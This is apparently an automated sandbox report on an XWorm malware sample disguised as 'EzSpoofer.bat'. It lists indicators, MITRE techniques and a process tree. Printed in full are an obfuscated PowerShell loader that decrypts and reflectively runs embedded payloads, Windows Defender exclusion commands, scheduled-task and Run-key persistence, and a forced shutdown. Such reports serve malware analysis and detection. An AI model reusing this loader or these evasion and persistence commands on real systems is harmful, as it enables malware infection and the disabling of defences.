xworm | 876279d2efe790bf2e60a1d6bae02b08228a485d208151a5b1278e2fd11e2369

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
5208	powershell.exe
5284	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\ProgramData\\powershell.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	powershell.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	powershell.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	powershell.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "226"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3740	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3500	powershell.exe
3500	powershell.exe
1168	powershell.exe
1168	powershell.exe
2548	powershell.exe
2548	powershell.exe
3660	msedge.exe
3660	msedge.exe
3652	msedge.exe
3652	msedge.exe
1372	powershell.exe
1372	powershell.exe
1372	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe
828	identity_helper.exe
828	identity_helper.exe
5208	powershell.exe
5208	powershell.exe
5208	powershell.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
5284	powershell.exe
5284	powershell.exe
5284	powershell.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3500	powershell.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeIncreaseQuotaPrivilege	1168	powershell.exe
Token: SeSecurityPrivilege	1168	powershell.exe
Token: SeTakeOwnershipPrivilege	1168	powershell.exe
Token: SeLoadDriverPrivilege	1168	powershell.exe
Token: SeSystemProfilePrivilege	1168	powershell.exe
Token: SeSystemtimePrivilege	1168	powershell.exe
Token: SeProfSingleProcessPrivilege	1168	powershell.exe
Token: SeIncBasePriorityPrivilege	1168	powershell.exe
Token: SeCreatePagefilePrivilege	1168	powershell.exe
Token: SeBackupPrivilege	1168	powershell.exe
Token: SeRestorePrivilege	1168	powershell.exe
Token: SeShutdownPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeSystemEnvironmentPrivilege	1168	powershell.exe
Token: SeRemoteShutdownPrivilege	1168	powershell.exe
Token: SeUndockPrivilege	1168	powershell.exe
Token: SeManageVolumePrivilege	1168	powershell.exe
Token: 33	1168	powershell.exe
Token: 34	1168	powershell.exe
Token: 35	1168	powershell.exe
Token: 36	1168	powershell.exe
Token: SeIncreaseQuotaPrivilege	1168	powershell.exe
Token: SeSecurityPrivilege	1168	powershell.exe
Token: SeTakeOwnershipPrivilege	1168	powershell.exe
Token: SeLoadDriverPrivilege	1168	powershell.exe
Token: SeSystemProfilePrivilege	1168	powershell.exe
Token: SeSystemtimePrivilege	1168	powershell.exe
Token: SeProfSingleProcessPrivilege	1168	powershell.exe
Token: SeIncBasePriorityPrivilege	1168	powershell.exe
Token: SeCreatePagefilePrivilege	1168	powershell.exe
Token: SeBackupPrivilege	1168	powershell.exe
Token: SeRestorePrivilege	1168	powershell.exe
Token: SeShutdownPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeSystemEnvironmentPrivilege	1168	powershell.exe
Token: SeRemoteShutdownPrivilege	1168	powershell.exe
Token: SeUndockPrivilege	1168	powershell.exe
Token: SeManageVolumePrivilege	1168	powershell.exe
Token: 33	1168	powershell.exe
Token: 34	1168	powershell.exe
Token: 35	1168	powershell.exe
Token: 36	1168	powershell.exe
Token: SeIncreaseQuotaPrivilege	1168	powershell.exe
Token: SeSecurityPrivilege	1168	powershell.exe
Token: SeTakeOwnershipPrivilege	1168	powershell.exe
Token: SeLoadDriverPrivilege	1168	powershell.exe
Token: SeSystemProfilePrivilege	1168	powershell.exe
Token: SeSystemtimePrivilege	1168	powershell.exe
Token: SeProfSingleProcessPrivilege	1168	powershell.exe
Token: SeIncBasePriorityPrivilege	1168	powershell.exe
Token: SeCreatePagefilePrivilege	1168	powershell.exe
Token: SeBackupPrivilege	1168	powershell.exe
Token: SeRestorePrivilege	1168	powershell.exe
Token: SeShutdownPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeSystemEnvironmentPrivilege	1168	powershell.exe
Token: SeRemoteShutdownPrivilege	1168	powershell.exe
Token: SeUndockPrivilege	1168	powershell.exe
Token: SeManageVolumePrivilege	1168	powershell.exe
Token: 33	1168	powershell.exe
Token: 34	1168	powershell.exe
Token: 35	1168	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe
1624	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5992	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 3500	2372	cmd.exe	82
PID 2372 wrote to memory of 3500	2372	cmd.exe	82
PID 3500 wrote to memory of 1168	3500	powershell.exe	83
PID 3500 wrote to memory of 1168	3500	powershell.exe	83
PID 3500 wrote to memory of 4300	3500	powershell.exe	88
PID 3500 wrote to memory of 4300	3500	powershell.exe	88
PID 4300 wrote to memory of 2840	4300	WScript.exe	89
PID 4300 wrote to memory of 2840	4300	WScript.exe	89
PID 2840 wrote to memory of 2548	2840	cmd.exe	91
PID 2840 wrote to memory of 2548	2840	cmd.exe	91
PID 3652 wrote to memory of 3044	3652	msedge.exe	94
PID 3652 wrote to memory of 3044	3652	msedge.exe	94
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 624	3652	msedge.exe	95
PID 3652 wrote to memory of 3660	3652	msedge.exe	96
PID 3652 wrote to memory of 3660	3652	msedge.exe	96
PID 3652 wrote to memory of 2232	3652	msedge.exe	97
PID 3652 wrote to memory of 2232	3652	msedge.exe	97
PID 3652 wrote to memory of 2232	3652	msedge.exe	97
PID 3652 wrote to memory of 2232	3652	msedge.exe	97
PID 3652 wrote to memory of 2232	3652	msedge.exe	97
PID 3652 wrote to memory of 2232	3652	msedge.exe	97
PID 3652 wrote to memory of 2232	3652	msedge.exe	97
PID 3652 wrote to memory of 2232	3652	msedge.exe	97
PID 3652 wrote to memory of 2232	3652	msedge.exe	97
PID 3652 wrote to memory of 2232	3652	msedge.exe	97

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LzMyn9z48x0Q4gbuWdOuMvyklX2ZjqkWkuihkCRVIvQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pe5tId8jJVo1uZ0oyFBZYg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YAedb=New-Object System.IO.MemoryStream(,$param_var); $lZKKA=New-Object System.IO.MemoryStream; $QbfIR=New-Object System.IO.Compression.GZipStream($YAedb, [IO.Compression.CompressionMode]::Decompress); $QbfIR.CopyTo($lZKKA); $QbfIR.Dispose(); $YAedb.Dispose(); $lZKKA.Dispose(); $lZKKA.ToArray();}function execute_function($param_var,$param2_var){ $YrspZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $otogi=$YrspZ.EntryPoint; $otogi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat';$EprqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat').Split([Environment]::NewLine);foreach ($hFcVg in $EprqD) { if ($hFcVg.StartsWith(':: ')) { $ccxXr=$hFcVg.Substring(3); break; }}$payloads_var=[string[]]$ccxXr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_880_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_880.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1168
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_880.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_880.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2840
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LzMyn9z48x0Q4gbuWdOuMvyklX2ZjqkWkuihkCRVIvQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pe5tId8jJVo1uZ0oyFBZYg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YAedb=New-Object System.IO.MemoryStream(,$param_var); $lZKKA=New-Object System.IO.MemoryStream; $QbfIR=New-Object System.IO.Compression.GZipStream($YAedb, [IO.Compression.CompressionMode]::Decompress); $QbfIR.CopyTo($lZKKA); $QbfIR.Dispose(); $YAedb.Dispose(); $lZKKA.Dispose(); $lZKKA.ToArray();}function execute_function($param_var,$param2_var){ $YrspZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $otogi=$YrspZ.EntryPoint; $otogi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_880.bat';$EprqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_880.bat').Split([Environment]::NewLine);foreach ($hFcVg in $EprqD) { if ($hFcVg.StartsWith(':: ')) { $ccxXr=$hFcVg.Substring(3); break; }}$payloads_var=[string[]]$ccxXr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2548
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1372
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4456
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4000
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3740
      - C:\Windows\SYSTEM32\shutdown.exe
        
        shutdown.exe /f /s /t 0
        6⤵
        
        PID:2420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8562646f8,0x7ff856264708,0x7ff856264718
  2⤵
  PID:3044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
  2⤵
  PID:624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
  2⤵
  PID:2232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  2⤵
  PID:1940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
